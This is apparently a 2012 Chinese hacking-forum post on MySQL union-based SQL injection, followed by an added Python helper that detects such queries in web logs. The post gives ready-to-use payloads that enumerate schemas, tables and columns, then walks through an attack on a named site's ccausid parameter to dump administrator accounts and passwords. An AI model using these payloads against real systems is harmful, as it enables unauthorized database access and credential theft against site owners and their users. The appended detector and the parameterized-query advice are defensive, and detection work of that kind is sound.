China Network Penetration Testing Alliance

Title: MySQL injection techniques

Author: admin    Time: 2012-9-13 16:29
Enumerating databases

id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*

Enumerating tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerating columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:

1. Dumping table names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Continuing this way, the admin_user table appeared at the fourth result.

2. Dumping column names
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dumping passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
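Added example, not part of the original post: a log-review helper that normalizes the /**/ padding and hex-encoded names used in the requests above, so that a query string from a web access log can be flagged and its hidden schema or table names read in clear text. The function names, the result fields and the benign sample are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

PAIRED_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # /**/ used in place of spaces
OPEN_COMMENT = re.compile(r"/\*.*\Z", re.S)       # trailing /* that cuts off the query
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
METADATA = re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b", re.I)

def normalize(query_string):
    """URL-decode and turn MySQL comments into spaces before matching."""
    text = unquote_plus(query_string)
    text = PAIRED_COMMENT.sub(" ", text)
    text = OPEN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip()

def decode_hex_literals(text):
    """Return the printable strings carried in 0x... literals."""
    decoded = []
    for match in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(match.group(1))
        if all(0x20 <= b < 0x7F for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded

def analyze(query_string):
    """Summarize the injection indicators found in one query string."""
    text = normalize(query_string)
    meta = METADATA.search(text)
    union = bool(UNION_SELECT.search(text))
    return {
        "union_select": union,
        "metadata_view": meta.group(1).upper() if meta else None,
        "decoded_literals": decode_hex_literals(text),
        "suspicious": union or meta is not None,
    }

# Query string of the table-name request shown in the post.
TABLE_REQUEST = ("ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5"
                 "/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA="
                 "0x79645F7465616D6E6574/**/limit/**/0,1/*")
BENIGN_REQUEST = "ccausid=13240"  # constructed sample of a normal request

if __name__ == "__main__":
    for qs in (TABLE_REQUEST, BENIGN_REQUEST):
        print(analyze(qs))
```

Matching on the normalized text is what makes the rule robust: a pattern written for "union select" with a literal space never fires on the comment-padded form, and the hex literals avoid the quote characters that simple filters look for. Flagging is a review aid only; the fix for the page being queried is a parameterized statement with ccausid bound as an integer.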